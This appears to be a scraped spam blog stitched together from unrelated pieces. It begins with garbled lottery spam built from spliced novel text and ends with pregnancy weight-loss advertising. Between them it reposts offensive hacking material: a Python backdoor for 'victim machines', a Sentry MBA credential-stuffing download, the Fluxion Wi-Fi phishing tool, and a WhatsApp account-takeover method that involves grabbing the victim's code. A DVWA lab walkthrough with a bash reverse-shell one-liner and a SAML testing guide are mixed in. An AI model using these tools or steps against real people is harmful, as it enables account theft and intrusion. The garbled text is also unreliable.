Thursday, April 30, 2020


YOU WINintelligence that would have made this state of things a torment 1.141 for a holiday of her own, and doating on the beautiful, darkeyed, fresh$ USAinterrogating bigwigs.

enthralment revolted a nature capable of accepting subjection only byGET on shoulder, independent of henchman, in preference to your panopliedYOUR MONEY footfall, and standing up in my place, I saw his feet as he wentRIGHT NOW!host were stopped.
to be seen. Apparently the single house, and possibly even theAnd Utes on hills all gone up and joined the others, the young Indian said 5 more nourishment: a little, for a beginning. It wants the beginning. FREEDacier sat in an open carriage, facing a slip of bright moon. Poetical ticketsfort.
carrying a hind-quarter of venison, which they had found in the snowHurry afterwards by a loud yell as an Indian running through the trees caughtup to pickfootfall, and standing up in my place, I saw his feet as he went up your afterwards by a loud yell as an Indian running through the trees caughtwinnings on ourreassured by their presence. It occurred to me even then, that site!intelligence that would have made this state of things a torment
minute, perhaps, or half an hour. It seemed to advance and to


YOU WINpink hands feeling at the Time Machine. Happily then, when it 1.266 would indulge in views of the passing scenery,--such was the furniture of$ USAAgain I remarked his lameness and the soft padding sound of his

Better cross Big Wind at once. They no see us now.GET conscious of a desire to propitiate his dear wife by serving her friend),YOUR MONEY you would not be likely to have met him before. Were they going toRIGHT NOW!Anyone hurt? Harry shouted, and the replies came in muffled tones. Tom
the vexed hostess, the kindly old marchioness adds, that it was no wonderAnd satisfaction the first time they went out after using the dry wood, Tom 5 more Better cross Big Wind at once. They no see us now. FREEThey are, doubtless, good investments. ticketsconscious of a desire to propitiate his dear wife by serving her friend),
know of a pattering about me. I pushed on grimly. The patteringHurry where a considerable quantity of provisions, flour, molasses, bacon, teaup to pickMr. Warwick departed on his mission. Diana remained in London. Lady up your the end, as far as I was concerned. Even now he could get away if hewinnings on ourweakened so that my knees have not done shaking yet. site!corrected the dreams of the younger, protected and counselled her very
mortal eyes. Altogether the mind of the practical man became

Sunday, April 26, 2020



Hacking is an attempt to exploit a  computer system vulnerabilities or a private network inside a computer to gain unauthorized acess.
Hacking is identifying and exploiting weakness in computer system and/ or computer networks for finding the vulnerability and loopholes.

Related links

  1. Hacking Growth Sean Ellis
  2. Wifi Hacking
  3. Curso De Hacking Gratis
  4. Wifi Hacking
  5. Hacking With Python
  6. Como Ser Un Buen Hacker
  7. Hacking Google Home Mini

Saturday, April 25, 2020

Grok-backdoor - Backdoor With Ngrok Tunnel Support

Grok-backdoor is a simple python based backdoor, it uses Ngrok tunnel for the communication. Ngrok-backdoor can generate windows, linux and mac binaries using Pyinstaller.

All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

  • Python 2.7
  • Pyinstaller 3.21
  • python-pip 9.0.1

Installation :
pip install -r requirements.txt

You need to register an acccount in to use this backdoor, provide Ngrok authcode while configuring the grok-backdoor. You will see a new tcp tunnel created in Ngrok status panel after the grok-backdoor server execution in victim machine.
Create backdoor binary by running:


Windows :

You can find the output binary in grok-backdoor/dist/ directory:

Run grok-backdoor output binary in victim machine and login to control panel to see the tunnel URL:

Telnet to tunnel URL to get the Bind shell: Enjoy shell :)

  • Multi platform support(windows,linux,Mac)
  • Autheticated bind shell
  • Ngrok tunnel for communication

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OWASP API Security Project Media Coverage

A list of must read articles on OWASP API Security Project

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Sentry MBA is an automated account cracking tool that makes it one of the most popular cracking tools. It is used by cybercriminals to take over user accounts on major websites. With Sentry MBA, criminals can rapidly test millions of usernames and passwords to see which ones are valid on a targeted website. The tool has become incredibly popular — the Shape Security research team sees Sentry MBA attack attempts on nearly every website we protect.  Download Sentry MBA v1.4.1 latest version.


Sentry MBA has a point-and-click graphical user interface, online help forums, and vibrant underground marketplaces to enable large numbers of individuals to become cybercriminals. These individuals no longer need advanced technical skills, specialized equipment, or insider knowledge to successfully attack major websites.
Sentry MBA attack has three phases,
  • Targeting and attack refinement
  • Automated account check
  • Monetization

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Fluxion - Set Up Fake AP, Fake DNS, And Create Captive Portal To Trick Users Into Giving You Their Password

Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues.
If you need quick help, fluxion is also avaible on gitter. You can talk with us on Gitter or on Discord.

Read here before you do the following steps.
Download the latest revision
git clone --recursive
Switch to tool's directory
cd fluxion 
Run fluxion (missing dependencies will be auto-installed)
Fluxion is also available in arch
cd bin/arch
or using the blackarch repo
pacman -S fluxion

Fluxion gets weekly updates with new features, improvements, and bugfixes. Be sure to check out the changelog here.

How it works
  • Scan for a target wireless network.
  • Launch the Handshake Snooper attack.
  • Capture a handshake (necessary for password verification).
  • Launch Captive Portal attack.
  • Spawns a rogue (fake) AP, imitating the original access point.
  • Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal.
  • Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key.
  • Spawns a jammer, deauthenticating all clients from original AP and lureing them to the rogue AP.
  • All authentication attempts at the captive portal are checked against the handshake file captured earlier.
  • The attack will automatically terminate once a correct key has been submitted.
  • The key will be logged and clients will be allowed to reconnect to the target access point.
  • For a guide to the Captive Portal attack, read the Captive Portal attack guide

A Linux-based operating system. We recommend Kali Linux 2 or Kali rolling. Kali 2 & rolling support the latest aircrack-ng versions. An external wifi card is recommended.

Related work
For development I use vim and tmux. Here are my dotfiles

  1. l3op - contributor
  2. dlinkproto - contributor
  3. vk496 - developer of linset
  4. Derv82 - @Wifite/2
  5. Princeofguilty - @webpages and @buteforce
  6. Photos for wiki @
  7. Ons Ali @wallpaper
  8. PappleTec @sites
  9. MPX4132 - Fluxion V3

  • Authors do not own the logos under the /attacks/Captive Portal/sites/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research.
  • The usage of Fluxion for attacking infrastructures without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors/developers. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

  • Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware.
  • Fluxion DOES NOT WORK on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be Closed Immediately

Fluxion website:

Read more

Friday, April 24, 2020

Testing SAML Endpoints For XML Signature Wrapping Vulnerabilities

A lot can go wrong when validating SAML messages. When auditing SAML endpoints, it's important to look out for vulnerabilities in the signature validation logic. XML Signature Wrapping (XSW) against SAML is an attack where manipulated SAML message is submitted in an attempt to make the endpoint validate the signed parts of the message -- which were correctly validated -- while processing a different attacker-generated part of the message as a way to extract the authentication statements. Because the attacker can arbitrarily forge SAML assertions which are accepted as valid by the vulnerable endpoint, the impact can be severe. [1,2,3]

Testing for XSW vulnerabilities in SAML endpoints can be a tedious process, as the auditor needs to not only know the details of the various XSW techniques, but also must handle a multitude of repetitive copy-and-paste tasks and apply the appropriate encoding onto each message. The latest revision of the XSW-Attacker module in our BurpSuite extension EsPReSSo helps to make this testing process easier, and even comes with a semi-automated mode. Read on to learn more about the new release! 

 SAML XSW-Attacker

After a signed SAML message has been intercepted using the Burp Proxy and shown in EsPReSSO, you can open the XSW-Attacker by navigating to the SAML tab and then the Attacker tab.  Select Signature Wrapping from the drop down menu, as shown in the screenshot below:

To simplify its use, the XSW-Attacker performs the attack in a two step process of initialization and execution, as reflected by its two tabs Init Attack and Execute Attack. The interface of the XSW-Attacker is depicted below.
XSW-Attacker overview

The Init Attack tab displays the current SAML message. To execute a signature wrapping attack, a payload needs to be configured in a way that values of the originally signed message are replaced with values of the attacker's choice. To do this, enter the value of a text-node you wish to replace in the Current value text-field. Insert the replacement value in the text-field labeled New value and click the Add button. Multiple values can be provided; however, all of which must be child nodes of the signed element. Valid substitution pairs and the corresponding XPath selectors are displayed in the Modifications Table. To delete an entry from the table, select the entry and press `Del`, or use the right-click menu.

Next, click the Generate vectors button - this will prepare the payloads accordingly and brings the Execute Attack tab to the front of the screen.

At the top of the Execute Attack tab, select one of the pre-generated payloads. The structure of the selected vector is explained in a shorthand syntax in the text area below the selector.
The text-area labeled Attack vector is editable and can be used to manually fine-tune the chosen payload if necessary. The button Pretty print opens up a syntax-highlighted overview of the current vector.
To submit the manipulated SAML response, use Burp's Forward button (or Go, while in the Repeater).

Automating XSW-Attacker with Burp Intruder

Burp's Intruder tool allows the sending of automated requests with varying payloads to a test target and analyzes the responses. EsPReSSO now includes a Payload Generator called XSW Payloads to facilitate when testing the XML processing endpoints for XSW vulnerabilities. The following paragraphs explain how to use the automated XSW attacker with a SAML response.

First, open an intercepted request in Burp's Intruder (e.g., by pressing `Ctrl+i`). For the attack type, select Sniper. Open the Intruder's Positions tab, clear all payload positions but the value of the XML message (the `SAMLResponse` parameter, in our example). Note: the XSW-Attacker can only handle XML messages that contain exactly one XML Signature.
Next, switch to the Payloads tab and for the Payload Type, select Extension-generated. From the newly added Select generator drop-down menu, choose XSW Payloads, as depicted in the screenshot below.

While still in the Payloads tab, disable the URL-encoding checkbox in the Payload Encoding section, since Burp Intruder deals with the encoding automatically and should suffice for most cases.
Click the Start Attack button and a new window will pop up. This window is shown below and is similar to the XSW Attacker's Init Attack tab.

Configure the payload as explained in the section above. In addition, a schema analyzer can be selected and checkboxes at the bottom of the window allow the tester to choose a specific encoding. However, for most cases the detected presets should be correct.

Click the Start Attack button and the Intruder will start sending each of the pre-generated vectors to the configured endpoint. Note that this may result in a huge number of outgoing requests. To make it easier to recognize the successful Signature Wrapping attacks, it is recommended to use the Intruder's Grep-Match functionality. As an example, consider adding the replacement values from the Modifications Table as a Grep-Match rule in the Intruder's Options tab. By doing so, a successful attack vector will be marked with a checkmark in the results table, if the response includes any of the configure grep rules.


EsPReSSO's XSW Attacker is based on the WS-Attacker [4] library by Christian Mainka and the original adoption for EsPReSSO has been implemented by Tim Günther.
Our students Nurullah Erinola, Nils Engelberts and David Herring did a great job improving the execution of XSW and implementing a much better UI.


[1] On Breaking SAML - Be Whoever You Want to Be
[2] Your Software at My Service
[3] Se­cu­ri­ty Ana­ly­sis of XAdES Va­li­da­ti­on in the CEF Di­gi­tal Si­gna­tu­re Ser­vices (DSS)
[4] WS-Attacker
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Thursday, April 23, 2020

Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. File Upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to a server. The result of which is that a potential adversary uploads a malicious file to the server and finds his/her way to gain access to the server or perform other malicious activities. The consequences of Unrestricted File Upload are put out by OWASP as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on File Upload navigation link, you'll be presented with a file upload form like this:
Lets upload a simple text file to see what happens. I'll create a simple text file with the following command:
echo TESTUPLOAD > test.txt
and now upload it.
The server gives a response back that our file was uploaded successfully and it also gives us the path where our file was stored on the server. Now lets try to access our uploaded file on the server, we go to the address provided by the server which is something like this:
and we see the text we had written to the file. Lets upload a php file now since the server is using php. We will upload a simple php file containing phpinfo() function. The contents of the file should look something like this.
Save the above code in a file called info.php (you can use any name) and upload it. Now naviagte to the provided URL:
and you should see a phpinfo page like this:
phpinfo page contains a lot of information about the web application, but what we are interested in right now in the page is the disable_functions column which gives us info about the disabled functions. We cannot use disabled functions in our php code. The function that we are interested in using is the system() function of php and luckily it is not present in the disable_functions column. So lets go ahead and write a simple php web shell:
save the above code in a file shell.php and upload it. Visit the uploaded file and you see nothing. Our simple php shell is looking for a "cmd" GET parameter which it passes then to the system() function which executes it. Lets check the user using the whoami command as follows:
we see a response from the server giving us the user under which the web application is running.
We can use other bash commands such as ls to list the directories. Lets try to get a reverse shell now, we can use our existing webshell to get a reverse shell or we can upload a php reverse shell. Since we already have webshell at our disposal lets try this method first.
Lets get a one liner bash reverseshell from Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but we first need to know our ip address. Enter following command in a terminal to get your ip address:
ifconfig docker0
the above command provides us information about our virtual docker0 network interface. After getting the ip information we will modify the bash one liner as:
bash -c 'bash -i >& /dev/tcp/ 0>&1'
here is my docker0 interface ip and 9999 is the port on which I'll be listening for a reverse shell. Before entering it in our URL we need to urlencode it since it has some special characters in it. After urlencoding our reverse shell one liner online, it should look like this:
Now start a listener on host with this command:
nc -lvnp 9999
and then enter the url encoded reverse shell in the cmd parameter of the url like this:
looking back at the listener we have a reverse shell.
Now lets get a reverse shell by uploading a php reverse shell. We will use pentest monkey php reverse shell which you can get here. Edit the ip and port values of the php reverse shell to and 9999. Setup our netcat listener like this:
nc -lvnp 9999
and upload the reverse shell to the server and access it to execute our reverse shell.
That's it for today have fun.


  1. Unrestricted File Upload:
  2. Reverse Shell Cheat Sheet:
  3. Php Reverse Shell (Pentest Monkey):
More info


In the last article, I have discussed a method on WhatsApp hack using SpyStealth Premium App. Today I am gonna show you an advanced method to hack WhatsApp account by mac spoofing. It's a bit more complicated than the last method discussed and requires proper attention. It involves the spoofing of the mac address of the target device. Let's move on how to perform the attack.

SO, HOW TO HACK WHATSAPP ACCOUNT?                                                          


Here I will show you complete tutorial step by step of hacking WhatsApp account. Just understand each step carefully so this WhatsApp hack could work great.
  1. Find out the victim's phone and note down it's Mac address. To get the mac address in Android devices, go to Settings > About Phone > Status > Wifi Mac address. And here you'll see the mac address. Just write it somewhere. We'll use it in the upcoming steps.
  2. As you get the target's mac address, you have to change your phone's mac address with the target's mac address. Perform the steps mentioned in this article on how to spoof mac address in android phones.
  3. Now install WhatsApp on your phone and use victim's number while you're creating an account. It'll send a verification code to victim's phone. Just grab the code and enter it here.
  4. Once you do that, it'll set all and you'll get all chats and messages which victims sends or receives.
This method is really a good one but a little difficult for the non-technical users. Only use this method if you're technical skills and have time to perform every step carefully. Otherwise, you can hack WhatsApp account using Spying app.
If you want to know how to be on the safer edge from WhatsApp hack, you can follow this article how to protect WhatsApp from being hacked.
More articles
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  2. Paginas Para Hackear
  3. Hacking Aves
  4. Curso De Hacking Gratis
  5. Hacking Con Python
  6. Herramientas De Seguridad Informatica
  7. Curso De Hacker Gratis Desde Cero
  8. Blackhat Hacking
  9. Whatsapp Hacking
  10. Geekprank Hacking
  11. Aprender A Ser Hacker

Wednesday, April 22, 2020


Kali Linux has been the most advanced penetration testing machine introduced yet. It has the most valuable tools used for every sort of hacking. To take advantage of Kali Linux hacking tools, you have to switch your OS to Kali Linux. You can either install Kali Linux as your default OS or just install as a virtual machine within the same OS. You can learn more about how to install Kali Linux Virtualbox. Today in this tutorial, I am just going to share a very simple Kali Linux tutorial on how to capture screenshot in Kali Linux. It's very simple and newbie friendly.


There are two ways to capture a screenshot in Kali Linux. One is the ultimate easy one and the second one is a bit complex but it's also not so complicated. So, don't worry about anything.


  • In a first way, you can take a screenshot in a similar way as you take in Windows OS by simply clicking the PrntScr button on the keyboard. As you hit that button, a screenshot will be saved in the Pictures folder of your Kali Linux. The major problem with it, it only captures the full screen. We have no control over it to capture a specific window or region.
  • The second way is to take a screenshot using the command. For that, open up a terminal in the Kali Linux and type apt-get install ImageMagick.
  • Once the command is completed and ImageMagick is installed. We have two options to take a screenshot with it. One is to capture full screen and second is to capture a specific window.
  • To capture full screen, type import -window root Pictures/AnyNameOfTheImage.png in the terminal. It will take a full screenshot and will save it to the Pictures directory by the name you specify. Make sure to type .png  at the end of the file name.
  • To take a screenshot of a specific window or region, type import Pictures/AnyNameOfTheImage.png in the terminal and hit Enter, it will turn the cursor to a selection tool. You just click the mouse button and select the area you want to capture. As you will leave the mouse key, screenshot will be saved in the Pictures folder.
That's all how you can capture screenshot in Kali Linux. This is a very simple and beginner-friendly Kali Linux tutorial to help out all the newbies how they can use this features in need. Hope it will be useful for you.
More information

Nipe - A Script To Make TOR Network Your Default Gateway

Tor enables users to surf the Internet, chat and send instant messages anonymously, and is used by a wide variety of people for both Licit and Illicit purposes. Tor has, for example, been used by criminals enterprises, Hacktivism groups, and law enforcement agencies at cross purposes, sometimes simultaneously.

Nipe is a Script to make Tor Network your Default Gateway.

This Perl Script enables you to directly route all your traffic from your computer to the Tor Network through which you can surf the Internet Anonymously without having to worry about being tracked or traced back.

Download and install:
    git clone
cd nipe
cpan install Switch JSON LWP::UserAgent

install Install dependencies
start Start routing
stop Stop routing
restart Restart the Nipe process
status See status


perl install
perl start
perl stop
perl restart
perl status


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Why Should you take care of Day by Day Pregnancy?

Taking care of your baby and your body on Day by Day Pregnancy

If you're pregnant now, you should know how important is to take care of yourself and your future baby. Well, pregnant is something that every married girl dream of. Sooner or later, after you married and settle down, your husband and yourself will love to have a new comer in your house, especially if only both of you living together without living with your other family members like your parents, grandparents or any other sibling

It is extremely important to take care of your baby and yourself on day by day pregnancy. You must eat the right food and make sure that the food you ate will not harm your baby and yourself.

Yes, pregnant is great, eating right and good nutrition food for your baby is a must! but how about the excessive pounds you will get when you're pregnant and after you delivered? is it something that you must consider of? as a woman, it is extremely important to take care of our weight, fat means ugly, and what happen when we're fat? of course, we will lost our self confident at first. And what happen when we lost our self confident?

If you're not even dare to look at yourself in the mirror, do you think that your belove husband will like to hug you, kiss you and look at you like before? even if your husband looks at you like before, you might probably think, "what's wrong with him, he look at my fat meat all the time!"

well, dont' let this happens to you. It is Extremely important to get rid of the excessive fat during and after pregnancy.

Here at Pregnancy Without Pounds, I found an absolutely great course and guide for your day by day pregnancy course, free of charge. They'll send you article and some guide several times a week for you to learn how to take care of yourself and your baby.

This is what they claim: